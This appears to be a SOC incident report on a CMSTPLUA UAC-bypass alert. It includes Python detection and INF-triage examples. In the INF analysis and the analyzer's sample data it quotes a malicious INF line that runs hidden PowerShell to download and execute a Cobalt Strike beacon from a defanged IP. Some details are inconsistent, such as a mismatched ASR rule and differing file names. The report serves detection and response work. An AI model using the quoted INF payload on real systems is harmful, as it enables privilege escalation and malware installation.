T1548.002 – Bypass User Account Control (Microsoft Defender Detection)

Microsoft Defender Alert Details
Alert ID: MD-UAC-BYPASS-1548-7842
Alert Time: 2024-03-10 11:30:22 EST
Severity: HIGH (88/100)
Source: Microsoft Defender for Endpoint
Rule: “UAC Bypass Attempt Detected – CMSTPLUA Technique”
MITRE ATT&CK: T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control

Alert Details:

Detection: Process attempted to bypass UAC using the CMSTPLUA COM interface

Host: HR-WS-023 (HR Workstation)
User: kwilson@company.com (Karen Wilson, HR)
Time: 11:25 EST

Process Tree:

explorer.exe (PID: 2341)
  rundll32.exe (PID: 4789)
    Command: rundll32.exe C:\Windows\System32\cmstplua.dll,Launch
    cmstp.exe (PID: 4792)
      Command: cmstp.exe /s C:\Users\kwilson\AppData\Local\Temp\install.inf

File Created:

C:\Users\kwilson\AppData\Local\Temp\install.inf
Content: Malicious INF file designed to execute an elevated command

Detection Logic:

The CMSTPLUA COM interface is a known UAC bypass technique (UACME #23)
User kwilson is a standard user and should not obtain a high-integrity process
INF file contains suspicious commands
Pattern matches UAC bypass used for privilege escalation
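The process tree and detection-logic bullets above describe the chain Defender matched: rundll32.exe loading cmstplua.dll,Launch, then cmstp.exe silently installing an INF from the user's Temp directory at high integrity for a standard user. The following Python is an added illustration, not Defender's rule and not code from this report: it applies those same criteria to constructed process-creation events modelled on the alert's process tree, with one benign cmstp.exe run by an administrator included for contrast. The event field names, the STANDARD_USERS set and the user-writable path pattern are assumptions.

```python
import re

# Constructed process-creation events modelled on the alert's process tree
# (explorer.exe -> rundll32.exe cmstplua.dll,Launch -> cmstp.exe /s <Temp>\install.inf),
# plus one benign cmstp.exe run by an administrator for contrast. Field names are assumed.
SAMPLE_EVENTS = [
    {"pid": 2341, "ppid": 1200, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe", "user": "kwilson", "integrity": "Medium"},
    {"pid": 4789, "ppid": 2341, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\cmstplua.dll,Launch",
     "user": "kwilson", "integrity": "Medium"},
    {"pid": 4792, "ppid": 4789, "image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r"cmstp.exe /s C:\Users\kwilson\AppData\Local\Temp\install.inf",
     "user": "kwilson", "integrity": "High"},
    # Benign contrast: an administrator installing a Connection Manager profile from a managed share.
    {"pid": 5100, "ppid": 900, "image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r"cmstp.exe /s \\fileserver\cm\corp-vpn.inf",
     "user": "itadmin", "integrity": "High"},
]

# Assumed: accounts that are standard users and should never obtain a High-integrity process.
STANDARD_USERS = {"kwilson"}

# An INF under a user-writable profile directory is the suspicious case; a managed
# Connection Manager deployment installs profiles from an admin-controlled location.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop)\\", re.I)
INF_ARG = re.compile(r"[A-Za-z]:\\[^\s\"]+?\.inf", re.I)
CMSTPLUA_LAUNCH = re.compile(r"cmstplua\.dll\s*,\s*launch", re.I)


def find_cmstplua_bypass(events, standard_users=STANDARD_USERS):
    """Return one finding per process that matches the CMSTPLUA bypass criteria."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = e["image"].rsplit("\\", 1)[-1].lower()
        cmd = e["cmdline"]
        reasons = []
        if name == "rundll32.exe" and CMSTPLUA_LAUNCH.search(cmd):
            reasons.append("rundll32.exe loading cmstplua.dll,Launch (CMSTPLUA COM elevation)")
        if name == "cmstp.exe":
            inf = INF_ARG.search(cmd)
            if "/s" in cmd.lower().split() and inf and USER_WRITABLE.search(inf.group(0)):
                reasons.append("silent cmstp.exe install of an INF from a user-writable path: " + inf.group(0))
            parent = by_pid.get(e["ppid"])
            if parent and "cmstplua.dll" in parent["cmdline"].lower():
                reasons.append("cmstp.exe spawned by a rundll32.exe host of cmstplua.dll")
            if e["integrity"] == "High" and e["user"] in standard_users:
                reasons.append("High-integrity cmstp.exe running as standard user " + e["user"])
        if reasons:
            findings.append({"pid": e["pid"], "image": name, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_cmstplua_bypass(SAMPLE_EVENTS):
        print(f"PID {f['pid']} ({f['image']}):")
        for r in f["reasons"]:
            print("  -", r)
```

Each criterion is reported separately so an analyst can see which part of the chain fired; the parent-process check and the integrity check are the two that distinguish this bypass from a legitimate silent profile install, which is why the administrator's run from a file share produces no finding.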
SOC Investigation Process

Step 1. Alert Validation
Action: Verify Defender alert
Tools Used: Microsoft 365 Defender
Findings: Confirmed UAC bypass attempt

Step 2. INF Analysis
Action: Analyze install.inf
Tools Used: Manual review, Sandbox
Findings: INF file executes PowerShell to download payload

Step 3. Process Investigation
Action: Identify source
Tools Used: CrowdStrike
Findings: User clicked “update” pop-up

Step 4. User Interview
Action: Contact kwilson
Tools Used: Teams, Phone
Findings: User clicked fake Adobe Flash update

Step 5. Immediate Action
Action: Terminate processes, delete INF
Tools Used: Defender
Findings: Processes killed; INF removed

Step 6. Account Remediation
Action: Reset password
Tools Used: Azure AD, AD
Findings: Password reset; MFA enforced

Jira Incident Report
Ticket: SOC-2024-198
Summary: T1548.002 – UAC Bypass Attempt via CMSTPLUA
Status: RESOLVED
Resolution: MALICIOUS – UAC Bypass Blocked
Priority: P2 – MEDIUM
Labels: T1548, uac-bypass, cmstplua, defender, phishing
Components: Endpoint-Security, Privilege-Escalation

INCIDENT ANALYSIS REPORT

1. Initial Context:

Detection Source: Microsoft Defender for Endpoint.
Alert: “UAC Bypass Attempt Detected – CMSTPLUA Technique”.
Host: HR-WS-023 (HR, user kwilson).
Method: CMSTPLUA COM interface.
Time: 2024-03-10 11:30 EST.
Technique: MITRE ATT&CK T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control.

2. Technical Analysis:

Attack Chain:

11:10 – User visits compromised site, sees fake “Adobe Flash Update”
11:12 – User clicks, downloads installer.inf
11:15 – User runs the file (or script runs automatically)
11:20 – PowerShell creates install.inf in Temp
11:22 – Script triggers UAC bypass via cmstplua.dll
11:23 – cmstp.exe launches with install.inf
11:24 – INF file runs PowerShell as high integrity
11:25 – Defender detects

UAC Bypass Technique:

Method: CMSTPLUA COM object (Microsoft Connection Manager)
Execution: rundll32 launches CMSTP via COM
Result: A medium-integrity process spawns a high-integrity process
Tool: UACME technique #23

INF File Analysis:

File: install.inf
Content:

[Version]
Signature=$CHICAGO$

[DefaultInstall]
RunPreSetupCommands=powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://185.143.221[.]89/beacon.exe -OutFile %temp%\beacon.exe; %temp%\beacon.exe"

Effect: Runs PowerShell with high integrity to download and execute beacon.exe (Cobalt Strike)
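The INF analysis above is what step 2 of the investigation produced by hand. As an added example (not the sandbox's output and not code from this report), the following Python parses an INF into sections, collects the commands behind RunPreSetupCommands and RunPostSetupCommands, and scores them against a small indicator list. It goes beyond the quoted file in one way: it also follows the indirect form, where the key names a section that lists the commands, which is how Connection Manager profiles normally express them. The sample INF is a constructed copy of the one quoted above with the URL still defanged; the benign and indirect samples, the indicator list and the verdict labels are assumptions.

```python
import re

# Constructed copy of the install.inf quoted in the report (download URL kept defanged).
SAMPLE_INF = r'''
[Version]
Signature=$CHICAGO$

[DefaultInstall]
RunPreSetupCommands=powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://185.143.221[.]89/beacon.exe -OutFile %temp%\beacon.exe; %temp%\beacon.exe"
'''

# Constructed benign profile: a registry change only, no setup commands.
BENIGN_INF = r'''
[Version]
Signature=$Windows NT$

[DefaultInstall]
AddReg=Reg.Add

[Reg.Add]
HKCU,Software\ExampleCorp\CM,Profile,,"corp-vpn"
'''

# Constructed indirect form: the key names a section that lists the commands (harmless here).
INDIRECT_INF = r'''
[Version]
Signature=$CHICAGO$

[DefaultInstall]
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
cmd.exe /c echo hello
'''

COMMAND_KEYS = {"runpresetupcommands", "runpostsetupcommands"}
SUSPICIOUS = [  # assumed indicator list; extend from your own triage experience
    (re.compile(r"\bpowershell(\.exe)?\b", re.I), "launches PowerShell"),
    (re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), "hides its window"),
    (re.compile(r"invoke-webrequest|downloadstring|downloadfile|\biwr\b|\bcurl\b", re.I), "downloads content"),
    (re.compile(r"%temp%|\\AppData\\Local\\Temp\\", re.I), "stages a file in %temp%"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "evaluates downloaded text"),
]
URL = re.compile(r"https?://[^\s\"';]+", re.I)


def parse_inf(text):
    """Return {section_lower: [(key_lower_or_None, value, raw_line), ...]} in file order."""
    sections, current = {}, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):          # blank line or INF comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
            continue
        key, sep, value = line.partition("=")
        entry = (key.strip().lower(), value.strip(), line) if sep else (None, line, line)
        sections.setdefault(current, []).append(entry)
    return sections


def setup_commands(sections):
    """Collect Run{Pre,Post}SetupCommands, following the value when it names a command section."""
    commands = []
    for entries in sections.values():
        for key, value, _ in entries:
            if key in COMMAND_KEYS:
                target = value.lower()
                if target in sections:                      # indirect: section lists the commands
                    commands.extend(raw for _, _, raw in sections[target])
                else:                                       # direct: the value is the command
                    commands.append(value)
    return commands


def analyze_inf(text):
    """Summarise signature, setup commands, matched indicators, URLs and a verdict."""
    sections = parse_inf(text)
    report = {"signature": None, "commands": [], "indicators": [], "urls": [], "verdict": "benign"}
    for key, value, _ in sections.get("version", []):
        if key == "signature":
            report["signature"] = value
    for cmd in setup_commands(sections):
        hits = [label for rx, label in SUSPICIOUS if rx.search(cmd)]
        report["commands"].append({"command": cmd, "indicators": hits})
        report["indicators"].extend(h for h in hits if h not in report["indicators"])
        report["urls"].extend(u for u in URL.findall(cmd) if u not in report["urls"])
    if report["indicators"]:
        report["verdict"] = "suspicious"
    elif report["commands"]:
        report["verdict"] = "review"      # runs something at setup; confirm it is expected
    return report


if __name__ == "__main__":
    for name, inf in (("install.inf", SAMPLE_INF), ("benign", BENIGN_INF), ("indirect", INDIRECT_INF)):
        print(name, analyze_inf(inf))
```

The $CHICAGO$ signature is not an indicator on its own, since legitimate profiles carry it too; the verdict rests on what the setup commands do, and any INF that runs a command at all is surfaced for review even when none of the indicators fire.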

Impact:

UAC bypass partially successful? (processes killed before full execution)

3. Investigation Findings:

Timeline:

11:10 – User visits site
11:15-11:24 – Bypass chain
11:25 – Alert
11:27 – SOC investigates
11:28 – Processes terminated, INF deleted

Indicators of Compromise (IoCs):

Files:

– C:\Users\kwilson\AppData\Local\Temp\install.inf

Network:

– http://185.143.221[.]89/beacon.exe

4. Containment Actions:

Immediate Actions:

Terminated cmstp.exe and rundll32.exe.
Deleted install.inf.
Blocked download URL.
Reset user password.

Host Remediation:

Full scan (clean).

5. Root Cause Analysis:

Primary Cause: User tricked by fake update.
Contributing Factors:
UAC bypass technique not blocked.

6. Business Impact:

Operational Impact: HR workstation offline for 1 hour.
Data Exposure: None.

7. Remediation & Prevention:

Completed Actions:

UAC bypass stopped.
User educated.

Technical Controls Enhanced:

Enabled ASR rule “Block abuse of exploited vulnerable signed drivers”.
Blocked cmstp.exe execution for standard users.

8. Conclusion:

An attacker attempted to bypass UAC using the CMSTPLUA technique to gain elevated privileges. Defender detected the attempt and terminated the processes before full compromise.

Closure Rationale: UAC bypass blocked; files removed; user educated.

Analyst: [Your Name], SOC Analyst Date: 2024-03-10 12:30 EST
